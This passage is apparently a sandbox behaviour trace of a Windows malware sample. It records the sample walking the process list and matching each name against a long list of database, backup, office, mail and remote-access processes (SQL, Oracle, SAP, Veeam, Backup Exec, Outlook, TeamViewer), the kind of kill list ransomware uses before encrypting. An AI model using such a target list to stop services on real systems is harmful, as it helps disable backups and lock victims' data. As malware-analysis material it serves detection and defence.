Ptr=0x2da43c8, Size=0x116f8) returned 0x2dc4d48 [0136.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2dc4d48, Length=0x116f8, ResultLength=0x3ff8d4 | out: SystemInformation=0x2dc4d48, ResultLength=0x3ff8d4*=0xd9a8) returned 0x0 [0136.080] _wcslwr (in: _String=0x2dc6078 | out: _String="system") returned="system" [0136.080] wcsstr (_Str="system", _SubStr="sql") returned 0x0 [0136.080] wcslen (_String="sql") returned 0x3 [0136.080] wcsstr (_Str="system", _SubStr="oracle") returned 0x0 [0136.080] wcslen (_String="oracle") returned 0x6 [0136.080] wcsstr (_Str="system", _SubStr="ocssd") returned 0x0 [0136.080] wcslen (_String="ocssd") returned 0x5 [0136.080] wcsstr (_Str="system", _SubStr="dbsnmp") returned 0x0 [0136.080] wcslen (_String="dbsnmp") returned 0x6 [0136.080] wcsstr (_Str="system", _SubStr="synctime") returned 0x0 [0136.080] wcslen (_String="synctime") returned 0x8 [0136.080] wcsstr (_Str="system", _SubStr="agntsvc") returned 0x0 [0136.080] wcslen (_String="agntsvc") returned 0x7 [0136.080] wcsstr (_Str="system", _SubStr="isqlplussvc") returned 0x0 [0136.080] wcslen (_String="isqlplussvc") returned 0xb [0136.080] wcsstr (_Str="system", _SubStr="xfssvccon") returned 0x0 [0136.080] wcslen (_String="xfssvccon") returned 0x9 [0136.080] wcsstr (_Str="system", _SubStr="mydesktopservice") returned 0x0 [0136.080] wcslen (_String="mydesktopservice") returned 0x10 [0136.080] wcsstr (_Str="system", _SubStr="ocautoupds") returned 0x0 [0136.080] wcslen (_String="ocautoupds") returned 0xa [0136.080] wcsstr (_Str="system", _SubStr="encsvc") returned 0x0 [0136.080] wcslen (_String="encsvc") returned 0x6 [0136.080] wcsstr (_Str="system", _SubStr="firefox") returned 0x0 [0136.080] wcslen (_String="firefox") returned 0x7 [0136.080] wcsstr (_Str="system", _SubStr="tbirdconfig") returned 0x0 [0136.080] wcslen (_String="tbirdconfig") returned 0xb [0136.080] wcsstr (_Str="system", _SubStr="mydesktopqos") returned 0x0 [0136.080] wcslen (_String="mydesktopqos") returned 0xc [0136.080] wcsstr (_Str="system", _SubStr="ocomm") returned 0x0 [0136.080] wcslen (_String="ocomm") returned 0x5 [0136.080] wcsstr (_Str="system", _SubStr="dbeng50") returned 0x0 [0136.080] wcslen (_String="dbeng50") returned 0x7 [0136.080] wcsstr (_Str="system", _SubStr="sqbcoreservice") returned 0x0 [0136.081] wcslen (_String="sqbcoreservice") returned 0xe [0136.081] wcsstr (_Str="system", _SubStr="excel") returned 0x0 [0136.081] wcslen (_String="excel") returned 0x5 [0136.081] wcsstr (_Str="system", _SubStr="infopath") returned 0x0 [0136.081] wcslen (_String="infopath") returned 0x8 [0136.081] wcsstr (_Str="system", _SubStr="msaccess") returned 0x0 [0136.081] wcslen (_String="msaccess") returned 0x8 [0136.081] wcsstr (_Str="system", _SubStr="mspub") returned 0x0 [0136.081] wcslen (_String="mspub") returned 0x5 [0136.081] wcsstr (_Str="system", _SubStr="onenote") returned 0x0 [0136.081] wcslen (_String="onenote") returned 0x7 [0136.081] wcsstr (_Str="system", _SubStr="outlook") returned 0x0 [0136.081] wcslen (_String="outlook") returned 0x7 [0136.081] wcsstr (_Str="system", _SubStr="powerpnt") returned 0x0 [0136.081] wcslen (_String="powerpnt") returned 0x8 [0136.081] wcsstr (_Str="system", _SubStr="steam") returned 0x0 [0136.081] wcslen (_String="steam") returned 0x5 [0136.081] wcsstr (_Str="system", _SubStr="thebat") returned 0x0 [0136.081] wcslen (_String="thebat") returned 0x6 [0136.081] wcsstr (_Str="system", _SubStr="thunderbird") returned 0x0 [0136.081] wcslen (_String="thunderbird") returned 0xb [0136.081] wcsstr (_Str="system", _SubStr="visio") returned 0x0 [0136.081] wcslen (_String="visio") returned 0x5 [0136.081] wcsstr (_Str="system", _SubStr="winword") returned 0x0 [0136.081] wcslen (_String="winword") returned 0x7 [0136.081] wcsstr (_Str="system", _SubStr="wordpad") returned 0x0 [0136.081] wcslen (_String="wordpad") returned 0x7 [0136.081] wcsstr (_Str="system", _SubStr="notepad") returned 0x0 [0136.081] wcslen (_String="notepad") returned 0x7 [0136.081] wcsstr (_Str="system", _SubStr="vsnapvss") returned 0x0 [0136.081] wcslen (_String="vsnapvss") returned 0x8 [0136.081] wcsstr (_Str="system", _SubStr="EnterpriseClient") returned 0x0 [0136.081] wcslen (_String="EnterpriseClient") returned 0x10 [0136.081] wcsstr (_Str="system", _SubStr="firefox") returned 0x0 [0136.081] wcslen (_String="firefox") returned 0x7 [0136.081] wcsstr (_Str="system", _SubStr="infopath") returned 0x0 [0136.082] wcslen (_String="infopath") returned 0x8 [0136.082] wcsstr (_Str="system", _SubStr="cvd") returned 0x0 [0136.082] wcslen (_String="cvd") returned 0x3 [0136.082] wcsstr (_Str="system", _SubStr="tv_x64.exe") returned 0x0 [0136.082] wcslen (_String="tv_x64.exe") returned 0xa [0136.082] wcsstr (_Str="system", _SubStr="VeeamTransportSvc") returned 0x0 [0136.082] wcslen (_String="VeeamTransportSvc") returned 0x11 [0136.082] wcsstr (_Str="system", _SubStr="steam") returned 0x0 [0136.082] wcslen (_String="steam") returned 0x5 [0136.082] wcsstr (_Str="system", _SubStr="encsvc") returned 0x0 [0136.082] wcslen (_String="encsvc") returned 0x6 [0136.082] wcsstr (_Str="system", _SubStr="mydesktopservice") returned 0x0 [0136.082] wcslen (_String="mydesktopservice") returned 0x10 [0136.082] wcsstr (_Str="system", _SubStr="outlook") returned 0x0 [0136.082] wcslen (_String="outlook") returned 0x7 [0136.082] wcsstr (_Str="system", _SubStr="synctime") returned 0x0 [0136.082] wcslen (_String="synctime") returned 0x8 [0136.082] wcsstr (_Str="system", _SubStr="ocssd") returned 0x0 [0136.082] wcslen (_String="ocssd") returned 0x5 [0136.082] wcsstr (_Str="system", _SubStr="SAP") returned 0x0 [0136.082] wcslen (_String="SAP") returned 0x3 [0136.082] wcsstr (_Str="system", _SubStr="cvfwd") returned 0x0 [0136.082] wcslen (_String="cvfwd") returned 0x5 [0136.082] wcsstr (_Str="system", _SubStr="bengien") returned 0x0 [0136.082] wcslen (_String="bengien") returned 0x7 [0136.082] wcsstr (_Str="system", _SubStr="vxmon") returned 0x0 [0136.082] wcslen (_String="vxmon") returned 0x5 [0136.082] wcsstr (_Str="system", _SubStr="bedbh") returned 0x0 [0136.082] wcslen (_String="bedbh") returned 0x5 [0136.082] wcsstr (_Str="system", _SubStr="ocomm") returned 0x0 [0136.082] wcslen (_String="ocomm") returned 0x5 [0136.082] wcsstr (_Str="system", _SubStr="ocautoupds") returned 0x0 [0136.082] wcslen (_String="ocautoupds") returned 0xa [0136.082] wcsstr (_Str="system", _SubStr="raw_agent_svc") returned 0x0 [0136.082] wcslen (_String="raw_agent_svc") returned 0xd [0136.082] wcsstr (_Str="system", _SubStr="oracle") returned 0x0 [0136.082] wcslen (_String="oracle") returned 0x6 [0136.083] wcsstr (_Str="system", _SubStr="disk+work") returned 0x0 [0136.083] wcslen (_String="disk+work") returned 0x9 [0136.083] wcsstr (_Str="system", _SubStr="powerpnt") returned 0x0 [0136.083] wcslen (_String="powerpnt") returned 0x8 [0136.083] wcsstr (_Str="system", _SubStr="saposcol") returned 0x0 [0136.083] wcslen (_String="saposcol") returned 0x8 [0136.083] wcsstr (_Str="system", _SubStr="sqbcoreservice") returned 0x0 [0136.083] wcslen (_String="sqbcoreservice") returned 0xe [0136.083] wcsstr (_Str="system", _SubStr="sapstartsrv") returned 0x0 [0136.083] wcslen (_String="sapstartsrv") returned 0xb [0136.083] wcsstr (_Str="system", _SubStr="beserver") returned 0x0 [0136.083] wcslen (_String="beserver") returned 0x8 [0136.083] wcsstr (_Str="system", _SubStr="saphostexec") returned 0x0 [0136.083] wcslen (_String="saphostexec") returned 0xb [0136.083] wcsstr (_Str="system", _SubStr="dbeng50") returned 0x0 [0136.083] wcslen (_String="dbeng50") returned 0x7 [0136.083] wcsstr (_Str="system", _SubStr="isqlplussvc") returned 0x0 [0136.083] wcslen (_String="isqlplussvc") returned 0xb [0136.083] wcsstr (_Str="system", _SubStr="CVODS") returned 0x0 [0136.083] wcslen (_String="CVODS") returned 0x5 [0136.083] wcsstr (_Str="system", _SubStr="DellSystemDetect") returned 0x0 [0136.083] wcslen (_String="DellSystemDetect") returned 0x10 [0136.083] wcsstr (_Str="system", _SubStr="CVMountd") returned 0x0 [0136.083] wcslen (_String="CVMountd") returned 0x8 [0136.083] wcsstr (_Str="system", _SubStr="TeamViewer.exe") returned 0x0 [0136.083] wcslen (_String="TeamViewer.exe") returned 0xe [0136.083] wcsstr (_Str="system", _SubStr="dbsnmp") returned 0x0 [0136.083] wcslen (_String="dbsnmp") returned 0x6 [0136.083] wcsstr (_Str="system", _SubStr="thunderbird") returned 0x0 [0136.083] wcslen (_String="thunderbird") returned 0xb [0136.083] wcsstr (_Str="system", _SubStr="mspub") returned 0x0 [0136.083] wcslen (_String="mspub") returned 0x5 [0136.083] wcsstr (_Str="system", _SubStr="wordpad") returned 0x0 [0136.083] wcslen (_String="wordpad") returned 0x7 [0136.083] wcsstr (_Str="system", _SubStr="visio") returned 0x0 [0136.083] wcslen (_String="visio") returned 0x5 [0136.083] wcsstr (_Str="system", _SubStr="benetns") returned 0x0 [0136.084] wcslen (_String="benetns") returned 0x7 [0136.084] wcsstr (_Str="system", _SubStr="QBCFMonitorService") returned 0x0 [0136.084] wcslen (_String="QBCFMonitorService") returned 0x12 [0136.084] wcsstr (_Str="system", _SubStr="TeamViewer_Service.exe") returned 0x0 [0136.084] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0136.084] wcsstr (_Str="system", _SubStr="tv_w32.exe") returned 0x0 [0136.084] wcslen (_String="tv_w32.exe") returned 0xa [0136.084] wcsstr (_Str="system", _SubStr="QBIDPService") returned 0x0 [0136.084] wcslen (_String="QBIDPService") returned 0xc [0136.084] wcsstr (_Str="system", _SubStr="winword") returned 0x0 [0136.084] wcslen (_String="winword") returned 0x7 [0136.084] wcsstr (_Str="system", _SubStr="thebat") returned 0x0 [0136.084] wcslen (_String="thebat") returned 0x6 [0136.084] wcsstr (_Str="system", _SubStr="VeeamDeploymentSvc") returned 0x0 [0136.084] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0136.084] wcsstr (_Str="system", _SubStr="avagent") returned 0x0 [0136.084] wcslen (_String="avagent") returned 0x7 [0136.084] wcsstr (_Str="system", _SubStr="QBDBMgrN") returned 0x0 [0136.084] wcslen (_String="QBDBMgrN") returned 0x8 [0136.084] wcsstr (_Str="system", _SubStr="mydesktopqos") returned 0x0 [0136.084] wcslen (_String="mydesktopqos") returned 0xc [0136.084] wcsstr (_Str="system", _SubStr="xfssvccon") returned 0x0 [0136.084] wcslen (_String="xfssvccon") returned 0x9 [0136.084] wcsstr (_Str="system", _SubStr="sql") returned 0x0 [0136.084] wcslen (_String="sql") returned 0x3 [0136.084] wcsstr (_Str="system", _SubStr="tbirdconfig") returned 0x0 [0136.084] wcslen (_String="tbirdconfig") returned 0xb [0136.084] wcsstr (_Str="system", _SubStr="CagService") returned 0x0 [0136.084] wcslen (_String="CagService") returned 0xa [0136.084] wcsstr (_Str="system", _SubStr="pvlsvr") returned 0x0 [0136.084] wcslen (_String="pvlsvr") returned 0x6 [0136.084] wcsstr (_Str="system", _SubStr="avscc") returned 0x0 [0136.084] wcslen (_String="avscc") returned 0x5 [0136.084] wcsstr (_Str="system", _SubStr="VeeamNFSSvc") returned 0x0 [0136.084] wcslen (_String="VeeamNFSSvc") returned 0xb [0136.084] wcsstr (_Str="system", _SubStr="onenote") returned 0x0 [0136.085] wcslen (_String="onenote") returned 0x7 [0136.085] wcsstr (_Str="system", _SubStr="excel") returned 0x0 [0136.085] wcslen (_String="excel") returned 0x5 [0136.085] wcsstr (_Str="system", _SubStr="msaccess") returned 0x0 [0136.085] wcslen (_String="msaccess") returned 0x8 [0136.085] wcsstr (_Str="system", _SubStr="agntsvc ") returned 0x0 [0136.085] wcslen (_String="agntsvc ") returned 0x8 [0136.085] _wcslwr (in: _String=0x2dc61c0 | out: _String="smss.exe") returned="smss.exe" [0136.085] wcsstr (_Str="smss.exe", _SubStr="sql") returned 0x0 [0136.085] wcslen (_String="sql") returned 0x3 [0136.085] wcsstr (_Str="smss.exe", _SubStr="oracle") returned 0x0 [0136.085] wcslen (_String="oracle") returned 0x6 [0136.085] wcsstr (_Str="smss.exe", _SubStr="ocssd") returned 0x0 [0136.085] wcslen (_String="ocssd") returned 0x5 [0136.085] wcsstr (_Str="smss.exe", _SubStr="dbsnmp") returned 0x0 [0136.085] wcslen (_String="dbsnmp") returned 0x6 [0136.085] wcsstr (_Str="smss.exe", _SubStr="synctime") returned 0x0 [0136.085] wcslen (_String="synctime") returned 0x8 [0136.085] wcsstr (_Str="smss.exe", _SubStr="agntsvc") returned 0x0 [0136.085] wcslen (_String="agntsvc") returned 0x7 [0136.085] wcsstr (_Str="smss.exe", _SubStr="isqlplussvc") returned 0x0 [0136.085] wcslen (_String="isqlplussvc") returned 0xb [0136.085] wcsstr (_Str="smss.exe", _SubStr="xfssvccon") returned 0x0 [0136.085] wcslen (_String="xfssvccon") returned 0x9 [0136.085] wcsstr (_Str="smss.exe", _SubStr="mydesktopservice") returned 0x0 [0136.085] wcslen (_String="mydesktopservice") returned 0x10 [0136.085] wcsstr (_Str="smss.exe", _SubStr="ocautoupds") returned 0x0 [0136.085] wcslen (_String="ocautoupds") returned 0xa [0136.085] wcsstr (_Str="smss.exe", _SubStr="encsvc") returned 0x0 [0136.085] wcslen (_String="encsvc") returned 0x6 [0136.085] wcsstr (_Str="smss.exe", _SubStr="firefox") returned 0x0 [0136.085] wcslen (_String="firefox") returned 0x7 [0136.085] wcsstr (_Str="smss.exe", _SubStr="tbirdconfig") returned 0x0 [0136.085] wcslen (_String="tbirdconfig") returned 0xb [0136.085] wcsstr (_Str="smss.exe", _SubStr="mydesktopqos") returned 0x0 [0136.085] wcslen (_String="mydesktopqos") returned 0xc [0136.085] wcsstr (_Str="smss.exe", _SubStr="ocomm") returned 0x0 [0136.086] wcslen (_String="ocomm") returned 0x5 [0136.086] wcsstr (_Str="smss.exe", _SubStr="dbeng50") returned 0x0 [0136.086] wcslen (_String="dbeng50") returned 0x7 [0136.086] wcsstr (_Str="smss.exe", _SubStr="sqbcoreservice") returned 0x0 [0136.086] wcslen (_String="sqbcoreservice") returned 0xe [0136.086] wcsstr (_Str="smss.exe", _SubStr="excel") returned 0x0 [0136.086] wcslen (_String="excel") returned 0x5 [0136.086] wcsstr (_Str="smss.exe", _SubStr="infopath") returned 0x0 [0136.086] wcslen (_String="infopath") returned 0x8 [0136.086] wcsstr (_Str="smss.exe", _SubStr="msaccess") returned 0x0 [0136.086] wcslen (_String="msaccess") returned 0x8 [0136.086] wcsstr (_Str="smss.exe", _SubStr="mspub") returned 0x0 [0136.086] wcslen (_String="mspub") returned 0x5 [0136.086] wcsstr (_Str="smss.exe", _SubStr="onenote") returned 0x0 [0136.086] wcslen (_String="onenote") returned 0x7 [0136.086] wcsstr (_Str="smss.exe", _SubStr="outlook") returned 0x0 [0136.086] wcslen (_String="outlook") returned 0x7 [0136.086] wcsstr (_Str="smss.exe", _SubStr="powerpnt") returned 0x0 [0136.086] wcslen (_String="powerpnt") returned 0x8 [0136.086] wcsstr (_Str="smss.exe", _SubStr="steam") returned 0x0 [0136.086] wcslen (_String="steam") returned 0x5 [0136.086] wcsstr (_Str="smss.exe", _SubStr="thebat") returned 0x0 [0136.086] wcslen (_String="thebat") returned 0x6 [0136.086] wcsstr (_Str="smss.exe", _SubStr="thunderbird") returned 0x0 [0136.086] wcslen (_String="thunderbird") returned 0xb [0136.086] wcsstr (_Str="smss.exe", _SubStr="visio") returned 0x0 [0136.086] wcslen (_String="visio") returned 0x5 [0136.086] wcsstr (_Str="smss.exe", _SubStr="winword") returned 0x0 [0136.086] wcslen (_String="winword") returned 0x7 [0136.086] wcsstr (_Str="smss.exe", _SubStr="wordpad") returned 0x0 [0136.086] wcslen (_String="wordpad") returned 0x7 [0136.086] wcsstr (_Str="smss.exe", _SubStr="notepad") returned 0x0 [0136.086] wcslen (_String="notepad") returned 0x7 [0136.086] wcsstr (_Str="smss.exe", _SubStr="vsnapvss") returned 0x0 [0136.086] wcslen (_String="vsnapvss") returned 0x8 [0136.086] wcsstr (_Str="smss.exe", _SubStr="EnterpriseClient") returned 0x0 [0136.086] wcslen (_String="EnterpriseClient") returned 0x10 [0136.087] wcsstr (_Str="smss.exe", _SubStr="firefox") returned 0x0 [0136.087] wcslen (_String="firefox") returned 0x7 [0136.087] wcsstr (_Str="smss.exe", _SubStr="infopath") returned 0x0 [0136.087] wcslen (_String="infopath") returned 0x8 [0136.087] wcsstr (_Str="smss.exe", _SubStr="cvd") returned 0x0 [0136.087] wcslen (_String="cvd") returned 0x3 [0136.087] wcsstr (_Str="smss.exe", _SubStr="tv_x64.exe") returned 0x0 [0136.087] wcslen (_String="tv_x64.exe") returned 0xa [0136.087] wcsstr (_Str="smss.exe", _SubStr="VeeamTransportSvc") returned 0x0 [0136.087] wcslen (_String="VeeamTransportSvc") returned 0x11 [0136.087] wcsstr (_Str="smss.exe", _SubStr="steam") returned 0x0 [0136.087] wcslen (_String="steam") returned 0x5 [0136.087] wcsstr (_Str="smss.exe", _SubStr="encsvc") returned 0x0 [0136.087] wcslen (_String="encsvc") returned 0x6 [0136.087] wcsstr (_Str="smss.exe", _SubStr="mydesktopservice") returned 0x0 [0136.087] wcslen (_String="mydesktopservice") returned 0x10 [0136.087] wcsstr (_Str="smss.exe", _SubStr="outlook") returned 0x0 [0136.087] wcslen (_String="outlook") returned 0x7 [0136.087] wcsstr (_Str="smss.exe", _SubStr="synctime") returned 0x0 [0136.087] wcslen (_String="synctime") returned 0x8 [0136.087] wcsstr (_Str="smss.exe", _SubStr="ocssd") returned 0x0 [0136.087] wcslen (_String="ocssd") returned 0x5 [0136.087] wcsstr (_Str="smss.exe", _SubStr="SAP") returned 0x0 [0136.087] wcslen (_String="SAP") returned 0x3 [0136.087] wcsstr (_Str="smss.exe", _SubStr="cvfwd") returned 0x0 [0136.087] wcslen (_String="cvfwd") returned 0x5 [0136.087] wcsstr (_Str="smss.exe", _SubStr="bengien") returned 0x0 [0136.087] wcslen (_String="bengien") returned 0x7 [0136.087] wcsstr (_Str="smss.exe", _SubStr="vxmon") returned 0x0 [0136.087] wcslen (_String="vxmon") returned 0x5 [0136.087] wcsstr (_Str="smss.exe", _SubStr="bedbh") returned 0x0 [0136.087] wcslen (_String="bedbh") returned 0x5 [0136.087] wcsstr (_Str="smss.exe", _SubStr="ocomm") returned 0x0 [0136.087] wcslen (_String="ocomm") returned 0x5 [0136.087] wcsstr (_Str="smss.exe", _SubStr="ocautoupds") returned 0x0 [0136.087] wcslen (_String="ocautoupds") returned 0xa [0136.087] wcsstr (_Str="smss.exe", _SubStr="raw_agent_svc") returned 0x0 [0136.088] wcslen (_String="raw_agent_svc") returned 0xd [0136.088] wcsstr (_Str="smss.exe", _SubStr="oracle") returned 0x0 [0136.088] wcslen (_String="oracle") returned 0x6 [0136.088] wcsstr (_Str="smss.exe", _SubStr="disk+work") returned 0x0 [0136.088] wcslen (_String="disk+work") returned 0x9 [0136.088] wcsstr (_Str="smss.exe", _SubStr="powerpnt") returned 0x0 [0136.088] wcslen (_String="powerpnt") returned 0x8 [0136.088] wcsstr (_Str="smss.exe", _SubStr="saposcol") returned 0x0 [0136.088] wcslen (_String="saposcol") returned 0x8 [0136.088] wcsstr (_Str="smss.exe", _SubStr="sqbcoreservice") returned 0x0 [0136.088] wcslen (_String="sqbcoreservice") returned 0xe [0136.088] wcsstr (_Str="smss.exe", _SubStr="sapstartsrv") returned 0x0 [0136.088] wcslen (_String="sapstartsrv") returned 0xb [0136.088] wcsstr (_Str="smss.exe", _SubStr="beserver") returned 0x0 [0136.088] wcslen (_String="beserver") returned 0x8 [0136.088] wcsstr (_Str="smss.exe", _SubStr="saphostexec") returned 0x0 [0136.088] wcslen (_String="saphostexec") returned 0xb [0136.088] wcsstr (_Str="smss.exe", _SubStr="dbeng50") returned 0x0 [0136.088] wcslen (_String="dbeng50") returned 0x7 [0136.088] wcsstr (_Str="smss.exe", _SubStr="isqlplussvc") returned 0x0 [0136.088] wcslen (_String="isqlplussvc") returned 0xb [0136.088] wcsstr (_Str="smss.exe", _SubStr="CVODS") returned 0x0 [0136.088] wcslen (_String="CVODS") returned 0x5 [0136.088] wcsstr (_Str="smss.exe", _SubStr="DellSystemDetect") returned 0x0 [0136.088] wcslen (_String="DellSystemDetect") returned 0x10 [0136.088] wcsstr (_Str="smss.exe", _SubStr="CVMountd") returned 0x0 [0136.088] wcslen (_String="CVMountd") returned 0x8 [0136.088] wcsstr (_Str="smss.exe", _SubStr="TeamViewer.exe") returned 0x0 [0136.088] wcslen (_String="TeamViewer.exe") returned 0xe [0136.088] wcsstr (_Str="smss.exe", _SubStr="dbsnmp") returned 0x0 [0136.088] wcslen (_String="dbsnmp") returned 0x6 [0136.088] wcsstr (_Str="smss.exe", _SubStr="thunderbird") returned 0x0 [0136.088] wcslen (_String="thunderbird") returned 0xb [0136.088] wcsstr (_Str="smss.exe", _SubStr="mspub") returned 0x0 [0136.088] wcslen (_String="mspub") returned 0x5 [0136.088] wcsstr (_Str="smss.exe", _SubStr="wordpad") returned 0x0 [0136.088] wcslen (_String="wordpad") returned 0x7 [0136.089] wcsstr (_Str="smss.exe", _SubStr="visio") returned 0x0 [0136.089] wcslen (_String="visio") returned 0x5 [0136.089] wcsstr (_Str="smss.exe", _SubStr="benetns") returned 0x0 [0136.089] wcslen (_String="benetns") returned 0x7 [0136.089] wcsstr (_Str="smss.exe", _SubStr="QBCFMonitorService") returned 0x0 [0136.089] wcslen (_String="QBCFMonitorService") returned 0x12 [0136.089] wcsstr (_Str="smss.exe", _SubStr="TeamViewer_Service.exe") returned 0x0 [0136.089] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0136.089] wcsstr (_Str="smss.exe", _SubStr="tv_w32.exe") returned 0x0 [0136.089] wcslen (_String="tv_w32.exe") returned 0xa [0136.089] wcsstr (_Str="smss.exe", _SubStr="QBIDPService") returned 0x0 [0136.089] wcslen (_String="QBIDPService") returned 0xc [0136.089] wcsstr (_Str="smss.exe", _SubStr="winword") returned 0x0 [0136.089] wcslen (_String="winword") returned 0x7 [0136.089] wcsstr (_Str="smss.exe", _SubStr="thebat") returned 0x0 [0136.089] wcslen (_String="thebat") returned 0x6 [0136.089] wcsstr (_Str="smss.exe", _SubStr="VeeamDeploymentSvc") returned 0x0 [0136.089] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0136.089] wcsstr (_Str="smss.exe", _SubStr="avagent") returned 0x0 [0136.089] wcslen (_String="avagent") returned 0x7 [0136.089] wcsstr (_Str="smss.exe", _SubStr="QBDBMgrN") returned 0x0 [0136.089] wcslen (_String="QBDBMgrN") returned 0x8 [0136.089] wcsstr (_Str="smss.exe", _SubStr="mydesktopqos") returned 0x0 [0136.089] wcslen (_String="mydesktopqos") returned 0xc [0136.089] wcsstr (_Str="smss.exe", _SubStr="xfssvccon") returned 0x0 [0136.089] wcslen (_String="xfssvccon") returned 0x9 [0136.089] wcsstr (_Str="smss.exe", _SubStr="sql") returned 0x0 [0136.089] wcslen (_String="sql") returned 0x3 [0136.089] wcsstr (_Str="smss.exe", _SubStr="tbirdconfig") returned 0x0 [0136.089] wcslen (_String="tbirdconfig") returned 0xb [0136.089] wcsstr (_Str="smss.exe", _SubStr="CagService") returned 0x0 [0136.089] wcslen (_String="CagService") returned 0xa [0136.089] wcsstr (_Str="smss.exe", _SubStr="pvlsvr") returned 0x0 [0136.089] wcslen (_String="pvlsvr") returned 0x6 [0136.089] wcsstr (_Str="smss.exe", _SubStr="avscc") returned 0x0 [0136.089] wcslen (_String="avscc") returned 0x5 [0136.089] wcsstr (_Str="smss.exe", _SubStr="VeeamNFSSvc") returned 0x0 [0136.089] wcslen (_String="VeeamNFSSvc") returned 0xb [0136.090] wcsstr (_Str="smss.exe", _SubStr="onenote") returned 0x0 [0136.090] wcslen (_String="onenote") returned 0x7 [0136.090] wcsstr (_Str="smss.exe", _SubStr="excel") returned 0x0 [0136.090] wcslen (_String="excel") returned 0x5 [0136.090] wcsstr (_Str="smss.exe", _SubStr="msaccess") returned 0x0 [0136.090] wcslen (_String="msaccess") returned 0x8 [0136.090] wcsstr (_Str="smss.exe", _SubStr="agntsvc ") returned 0x0 [0136.090] wcslen (_String="agntsvc ") returned 0x8 [0136.090] _wcslwr (in: _String=0x2dc64d0 | out: _String="csrss.exe") returned="csrss.exe" [0136.090] wcsstr (_Str="csrss.exe", _SubStr="sql") returned 0x0 [0136.090] wcslen (_String="sql") returned 0x3 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="oracle") returned 0x0 [0136.090] wcslen (_String="oracle") returned 0x6 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="ocssd") returned 0x0 [0136.090] wcslen (_String="ocssd") returned 0x5 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="dbsnmp") returned 0x0 [0136.090] wcslen (_String="dbsnmp") returned 0x6 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="synctime") returned 0x0 [0136.090] wcslen (_String="synctime") returned 0x8 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="agntsvc") returned 0x0 [0136.090] wcslen (_String="agntsvc") returned 0x7 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="isqlplussvc") returned 0x0 [0136.090] wcslen (_String="isqlplussvc") returned 0xb [0136.090] wcsstr (_Str="csrss.exe", _SubStr="xfssvccon") returned 0x0 [0136.090] wcslen (_String="xfssvccon") returned 0x9 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="mydesktopservice") returned 0x0 [0136.090] wcslen (_String="mydesktopservice") returned 0x10 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="ocautoupds") returned 0x0 [0136.090] wcslen (_String="ocautoupds") returned 0xa [0136.090] wcsstr (_Str="csrss.exe", _SubStr="encsvc") returned 0x0 [0136.090] wcslen (_String="encsvc") returned 0x6 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="firefox") returned 0x0 [0136.090] wcslen (_String="firefox") returned 0x7 [0136.090] wcsstr (_Str="csrss.exe", _SubStr="tbirdconfig") returned 0x0 [0136.090] wcslen (_String="tbirdconfig") returned 0xb [0136.090] wcsstr (_Str="csrss.exe", _SubStr="mydesktopqos") returned 0x0 [0136.090] wcslen (_String="mydesktopqos") returned 0xc [0136.091] wcsstr (_Str="csrss.exe", _SubStr="ocomm") returned 0x0 [0136.091] wcslen (_String="ocomm") returned 0x5 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="dbeng50") returned 0x0 [0136.091] wcslen (_String="dbeng50") returned 0x7 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="sqbcoreservice") returned 0x0 [0136.091] wcslen (_String="sqbcoreservice") returned 0xe [0136.091] wcsstr (_Str="csrss.exe", _SubStr="excel") returned 0x0 [0136.091] wcslen (_String="excel") returned 0x5 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="infopath") returned 0x0 [0136.091] wcslen (_String="infopath") returned 0x8 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="msaccess") returned 0x0 [0136.091] wcslen (_String="msaccess") returned 0x8 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="mspub") returned 0x0 [0136.091] wcslen (_String="mspub") returned 0x5 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="onenote") returned 0x0 [0136.091] wcslen (_String="onenote") returned 0x7 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="outlook") returned 0x0 [0136.091] wcslen (_String="outlook") returned 0x7 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="powerpnt") returned 0x0 [0136.091] wcslen (_String="powerpnt") returned 0x8 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="steam") returned 0x0 [0136.091] wcslen (_String="steam") returned 0x5 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="thebat") returned 0x0 [0136.091] wcslen (_String="thebat") returned 0x6 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="thunderbird") returned 0x0 [0136.091] wcslen (_String="thunderbird") returned 0xb [0136.091] wcsstr (_Str="csrss.exe", _SubStr="visio") returned 0x0 [0136.091] wcslen (_String="visio") returned 0x5 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="winword") returned 0x0 [0136.091] wcslen (_String="winword") returned 0x7 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="wordpad") returned 0x0 [0136.091] wcslen (_String="wordpad") returned 0x7 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="notepad") returned 0x0 [0136.091] wcslen (_String="notepad") returned 0x7 [0136.091] wcsstr (_Str="csrss.exe", _SubStr="vsnapvss") returned 0x0 [0136.092] wcslen (_String="vsnapvss") returned 0x8 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="EnterpriseClient") returned 0x0 [0136.092] wcslen (_String="EnterpriseClient") returned 0x10 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="firefox") returned 0x0 [0136.092] wcslen (_String="firefox") returned 0x7 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="infopath") returned 0x0 [0136.092] wcslen (_String="infopath") returned 0x8 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="cvd") returned 0x0 [0136.092] wcslen (_String="cvd") returned 0x3 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="tv_x64.exe") returned 0x0 [0136.092] wcslen (_String="tv_x64.exe") returned 0xa [0136.092] wcsstr 